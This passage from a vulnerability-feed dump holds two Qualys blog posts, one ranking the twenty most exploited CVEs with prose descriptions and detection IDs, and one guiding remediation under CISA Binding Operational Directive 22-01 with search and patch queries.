rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft's Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or "ETERNALBLUE," or "ETERNALSYNERGY" or "ETERNAL ROMANCE" is a remote code execution vulnerability in Microsoft's Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the "HotSpot" component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. **CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-44228, or "Log4Shell," is a severe vulnerability in Apache's log4j Java library. The flaw exploits the 'lookups' feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. **CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash's processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-19781, or "Shitrix," is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user's context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users' mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian's Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3-1070x588.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights & Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-04T14:00:00", "type": "qualysblog", "title": "Qualys Top 20 Most Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0074", "CVE-2014-6271", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2018-13379", "CVE-2018-8174", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-2725", "CVE-2020-1472", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-09-04T14:00:00", "id": "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", 